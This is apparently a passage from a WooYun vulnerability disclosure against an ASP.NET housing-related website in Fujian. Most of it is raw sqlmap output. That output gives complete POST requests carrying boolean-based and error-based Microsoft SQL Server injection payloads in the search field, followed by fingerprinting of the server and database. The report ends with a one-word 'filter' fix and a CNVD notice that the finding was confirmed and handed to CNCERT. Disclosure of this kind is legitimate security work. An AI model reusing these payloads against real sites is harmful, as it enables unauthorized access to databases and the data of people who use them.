jb20ZaHR0cDovL3d3dy5wZW9wbGUuY29tLmNuLxVodHRwOi8vd3d3LmhleHVuLmNvbS8ZaHR0cDovL3d
3dy54aW5odWFuZXQuY29tLxVodHRwOi8vZnouc291ZnVuLmNvbS8baHR0cDovL3d3dy5jaGluYS5jb20
vemhfY24vFCsDCGdnZ2dnZ2dnZGRkBwMtrwOfV8mPVqGTGSjwsRgXm3s=&__EVENTVALIDATION=/wEW
JALej7zhCwKL+9KyDgK0gMnQAQK77+O+DQK67+O+DQK57+O+DQK47+O+DQKln/PuCgK9l+PkCwKN5NbZ
BwLb2KFcAuXp1uwLAv+YtpwJAvzjt4ACApbribUJAtON+OkCAuGR+4QKAveSyOQNApCGuoUEArmSlLwK
ArfNzccIAr/FrYAMAvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcO
Arb4gqUJAtL4xMcOAuGA1Z8HAvD9kDgCkt303QkCtfe5hgzN2Y6QwK88UmZ0ZoZYtGjjRTNghw==&txt
Key=1%' AND 5886=5886 AND '%'='&ddlType=1&btnSearch=%E6%9F%A5%E6%89%BE&ddlPageIn
dex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottom
Info1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTc2NjE3MTE2OQ8WAh4MRGVmYXVsdEltYWdlBQ0vaW1hZ2V
zLzMuanBnFgICAw9kFg4CAQ9kFgICAQ8WAh4LXyFJdGVtQ291bnQCDRYaAgEPZBYCZg8VAg4vSG9tZVB
hZ2UuYXNweAbpppbpobVkAgIPZBYCZg8VAkcvSW5zdGl0dXRpb25zSW50cm9kdWNlZC5hc3B4P2NsYXN
zPTZiNDM5Njk5LTkyMGUtNDliNC05NWI4LTUzZDczYmRmN2VlMQzmnLrmnoTnroDku4tkAgMPZBYCZg8
VAj4vTmV3c0JvbGNrTGlzdC5hc3B4P2NsYXNzPTQ4MzA0ODFkLWUxODAtNDNlNi1hOWY1LWJiZjdmOWI
4OTEzMwzmlL/nrZbms5Xop4RkAgQPZBYCZg8VAj4vTmV3c0JvbGNrTGlzdC5hc3B4P2NsYXNzPWM0Yzd
hMDhhLTVkYmQtNDc5MS04OGVlLWQ4MmFmNGNlNGY4YQzotYTorq/kv6Hmga9kAgUPZBYCZg8VAhMvSW5
mb3JtYXRpb25abi5hc3B4DOS/oeaBr+WFrOW8gGQCBg9kFgJmDxUCPS9MYXdHdWlkZU1haW4uYXNweD9
jbGFzcz1jOTU3Njk1Yi1mMGM1LTQ5ZWMtYTEyOS1hZmZmN2ZiNTRlN2YM5Yqe5LqL5oyH5Y2XZAIHD2Q
WAmYPFQI/L0xvYW5hYmxlRXN0YXRlLmFzcHg/Y2xhc3M9OWI5NjM0M2ItMDA1MS00YmMxLWE2M2MtM2R
iZjZkYTYxOWEzDOWPr+i0t+alvOebmGQCCA9kFgJmDxUCES9NZW1iZXJMb2dpbi5hc3B4DOWcqOe6v+a
fpeivomQCCQ9kFgJmDxUCGC9CdXNpbmVzc0NvbnN1bHRpbmcuYXNweAzlnKjnur/lkqjor6JkAgoPZBY
CZg8VAhEvQ29tbXVuaWNhdGUuYXNweAzkuK3lv4PlnLDlm75kAgsPZBYCZg8VAg8vVG9vbHNMaXN0LmF
zcHgM5bi455So5bel5YW3ZAIMD2QWAmYPFQISL0Rvd25Mb2FkTGlzdC5hc3B4DOS4i+i9veS4reW/g2Q
CDQ9kFgJmDxUCEy9QZXJmRGVtYW5kc1RKLmFzcHgM5pWI6IO96K+J5rGCZAIFDxBkDxYFZgIBAgICAwI
EFgUQBQ0tLeivt+mAieaLqS0tZWcQBQnllYblk4HmiL8FATFnEAUP57uP5rWO6YCC55So5oi/BQEyZxA
FCeS6jOaJi+aIvwUBM2cQBQzlhbbku5bnsbvlnosFATRnZGQCCQ8WAh8BAgEWAgIBD2QWAmYPFQIcTmV
3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9MTIwOAznvo7lnLDlpKfpgZNkAgsPFgIfAQIHFg4CAQ9kFgZmDxU
BHE5ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTEyMDhkAgEPDxYCHgRUZXh0BQnllYblk4HmiL9kZAICDxU
CDOe+juWcsOWkp+mBkwoyMDEyLTA1LTAzZAICD2QWBmYPFQEcTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU
9MTIwOWQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8VAgzlkInnpaXnpo/pgrgKMjAxMi0wNS0wM2QCAw9
kFgZmDxUBHE5ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTEyMTBkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgI
PFQIJ5LiK5rKz5Z+OCjIwMTItMDUtMDNkAgQPZBYGZg8VARtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT0
0MjlkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIn5rOw5a6B5Zu95rOw5oi/5Zyw5Lqn5byA5Y+R5py
J6ZmQ5YWs5Y+4AGQCBQ9kFgZmDxUBG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMGQCAQ8PFgIfAgU
J5ZWG5ZOB5oi/ZGQCAg8VAh3kuJzlronmlrDmnZExM+W5ou+8iOebm+WPke+8iQBkAgYPZBYGZg8VARt
OZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzFkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIh5bel5Li
a5YyX6LevMTA55Y+377yI55yB5LiA5bu677yJAGQCBw9kFgZmDxUBG05ld3NWaWV3LmFzcHg/SG91c2V
Db2RlPTQzMmQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8VAh7lt6XkuJrljZfot68xMTHlj7fvvIjnoYD
pkavvvIkAZAINDxYCHwECChYUZg9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMA0vaW1
hZ2VzLzMuanBnG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMB3kuJzlronmlrDmnZExM+W5ou+8iOe
bm+WPke+8iQAAZAIBDw8WAh8CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29
kZT00MzBkAgEPZBYGZg8VBhtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzENL2ltYWdlcy8zLmpwZxt
OZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzEh5bel5Lia5YyX6LevMTA55Y+377yI55yB5LiA5bu677y
JAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMWQ
CAg9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMg0vaW1hZ2VzLzMuanBnG05ld3NWaWV
3LmFzcHg/SG91c2VDb2RlPTQzMh7lt6XkuJrljZfot68xMTHlj7fvvIjnoYDpkavvvIkAAGQCAQ8PFgI
fAgUJ5ZWG5ZOB5oi/ZGQCAg8VAgAbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDMyZAIDD2QWBmYPFQY
bTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDM0DS9pbWFnZXMvMy5qcGcbTmV3c1ZpZXcuYXNweD9Ib3V
zZUNvZGU9NDM0G+S4iuefpeWbrTEtMuW5ou+8iOWxleaXuu+8iQAAZAIBDw8WAh8CBQnllYblk4HmiL9
kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzRkAgQPZBYGZg8VBhtOZXdzVmlldy5hc3B
4P0hvdXNlQ29kZT00NDENL2ltYWdlcy8zLmpwZxtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NDEj546
r55Gw5paw5p2RNzPjgIE3N+OAgTgx5bmiKOeri+S4sCkAAGQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8
VAgAbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDQxZAIFD2QWBmYPFQYbTmV3c1ZpZXcuYXNweD9Ib3V
zZUNvZGU9NDQ2DS9pbWFnZXMvMy5qcGcbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDQ2JeS5vum+mea
WsOadkTMwMeW5ou+8iOaXtuS7oy7mnpfnq4vvvIkAAGQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8VAgA
bTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDQ2ZAIGD2QWBmYPFQYbTmV3c1ZpZXcuYXNweD9Ib3VzZUN
vZGU9NDUwDS9pbWFnZXMvMy5qcGcbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDUwGuW3peS4muWNl+i
3rzE2N+WPtyjpl73mlrApAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg
/SG91c2VDb2RlPTQ1MGQCBw9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ1Mg0vaW1hZ2V
zLzMuanBnG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ1MhzkuIrmmKXlm60xLTM15bmi77yI5bGV5pe
677yJAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ
1MmQCCA9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ1NQ0vaW1hZ2VzLzMuanBnG05ld3N
WaWV3LmFzcHg/SG91c2VDb2RlPTQ1NSPlt6XkuJrot68xMDDlj7c1MOW5ou+8iOecgeS4gOW7uu+8iQA
AZAIBDw8WAh8CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NTVkAgk
PZBYGZg8VBhtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NTgNL2ltYWdlcy8zLmpwZxtOZXdzVmlldy5
hc3B4P0hvdXNlQ29kZT00NTgf5rC05qat5paw5Z+OOS0xMuW5ou+8iOaYk+i+vu+8iQAAZAIBDw8WAh8
CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NThkAg8PDxYCHg5QYWd
lclJlY29yZE51bQJ6ZGQCEQ9kFggCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQhMaW5rTmFtZR4ORGF0YVZ
hbHVlRmllbGQFB0xpbmtVcmweC18hRGF0YUJvdW5kZ2QQFQMTLS0t5ZCI5L2c5Y2V5L2NLS0tLR7kuIn
mmI7miL/lnLDkuqfnrqHnkIbkv6Hmga/nvZEe5LiJ5piO5L2P5oi/572u5Lia5ouF5L+d5YWs5Y+4FQM
AF2h0dHA6Ly93d3cuc21mZGMuY29tLmNuE2h0dHA6Ly93d3cuc21mZGMuY24UKwMDZ2dnZGQCAw8QDxY
GHwQFCExpbmtOYW1lHwUFB0xpbmtVcmwfBmdkEBUFEy0tLeaUv+W6nOmDqOmXqC0tLS0b5LiJ5piO5bi
C5Lq65rCR5pS/5bqc572R56uZHuS4reWkruS6uuawkeaUv+W6nOmXqOaIt+e9keermRjnpo/lu7rnnIH
lu7rorr7kv6Hmga/nvZES56aP5bu655yB6LSi5pS/5Y6FFQUAFGh0dHA6Ly93d3cuc20uZ292LmNuEmh
0dHA6Ly93d3cuZ292LmNuLxdodHRwOi8vd3d3LmZqanMuZ292LmNuLxlodHRwOi8vd3d3LmZqaWNwYS5
vcmcuY24vFCsDBWdnZ2dnZGQCBQ8QDxYGHwQFCExpbmtOYW1lHwUFB0xpbmtVcmwfBmdkEBUMFi0tLeW
FtuS7luWFrOenr+mHkS0tLS0b56aP5bee5L2P5oi/5YWs56ev6YeR572R56uZG+WOpumXqOS9j+aIv+W
FrOenr+mHkee9keermRvmvLPlt57kvY/miL/lhaznp6/ph5HnvZHnq5kb5rOJ5bee5L2P5oi/5YWs56e
v6YeR572R56uZG+m+meWyqeS9j+aIv+WFrOenr+mHkee9keermRvljZflubPkvY/miL/lhaznp6/ph5H
nvZHnq5kb5a6B5b635L2P5oi/5YWs56ev6YeR572R56uZG+iOhueUsOS9j+aIv+WFrOenr+mHkee9kee
rmRvljJfkuqzkvY/miL/lhaznp6/ph5HnvZHnq5kb5LiK5rW35L2P5oi/5YWs56ev6YeR572R56uZG+W
kqea0peS9j+aIv+WFrOenr+mHkee9keermRUMABZodHRwOi8vd3d3LmZ6emZnamouY29tF2h0dHA6Ly9
3d3cueG1namouZ292LmNuGGh0dHA6Ly93d3cuenpnamouZ292LmNuLxRodHRwOi8vd3d3LnF6Z2pqLmN
vbRlodHRwOi8vd3d3Lmxvbmd5YW5namouY29tFGh0dHA6Ly93d3cubnBnamouY29tFGh0dHA6Ly93d3c
ubmRnamouY29tFGh0dHA6Ly93d3cucHRnamouY29tF2h0dHA6Ly93d3cuYmpnamouZ292LmNuFGh0dHA
6Ly93d3cuc2hnamouY29tF2h0dHA6Ly93d3cuaG91c2VmdW5kLmNuFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgc
PEA8WBh8EBQhMaW5rTmFtZR8FBQdMaW5rVXJsHwZnZBAVCBMtLS3lhbbku5bnvZHnq5ktLS0tD+aIv+S
6p+S5i+eql+e9kQbnmb7luqYJ5Lq65rCR572RCeWSjOiur+e9kQnmlrDljY7nvZEP56aP5bee5pCc5oi
/572RCeS4reWNjue9kRUIABhodHRwOi8vd3d3LmVob21lZGF5LmNvbS8UaHR0cDovL3d3dy5iYWlkdS5
jb20ZaHR0cDovL3d3dy5wZW9wbGUuY29tLmNuLxVodHRwOi8vd3d3LmhleHVuLmNvbS8ZaHR0cDovL3d
3dy54aW5odWFuZXQuY29tLxVodHRwOi8vZnouc291ZnVuLmNvbS8baHR0cDovL3d3dy5jaGluYS5jb20
vemhfY24vFCsDCGdnZ2dnZ2dnZGRkBwMtrwOfV8mPVqGTGSjwsRgXm3s=&__EVENTVALIDATION=/wEW
JALej7zhCwKL+9KyDgK0gMnQAQK77+O+DQK67+O+DQK57+O+DQK47+O+DQKln/PuCgK9l+PkCwKN5NbZ
BwLb2KFcAuXp1uwLAv+YtpwJAvzjt4ACApbribUJAtON+OkCAuGR+4QKAveSyOQNApCGuoUEArmSlLwK
ArfNzccIAr/FrYAMAvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcO
Arb4gqUJAtL4xMcOAuGA1Z8HAvD9kDgCkt303QkCtfe5hgzN2Y6QwK88UmZ0ZoZYtGjjRTNghw==&txt
Key=1%' AND 2828=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(108)+CHAR(117)+CHA
R(113)+(SELECT (CASE WHEN (2828=2828) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113
)+CHAR(109)+CHAR(103)+CHAR(114)+CHAR(113))) AND '%'='&ddlType=1&btnSearch=%E6%9F
%A5%E6%89%BE&ddlPageIndex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dl
stzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=
---
[18:09:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


1.jpg


2.jpg


依旧是获取信息上有些问题,可能要用tamper或者手工?就不继续了!~~~

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-19 11:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。

最新状态:

暂无